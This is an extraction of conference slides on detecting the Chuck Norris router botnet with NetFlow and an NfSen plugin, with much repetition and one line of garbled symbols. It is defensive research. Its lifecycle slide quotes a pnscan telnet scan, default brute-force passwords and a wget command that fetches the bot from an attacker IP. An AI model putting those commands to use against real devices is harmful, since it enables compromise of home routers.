1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
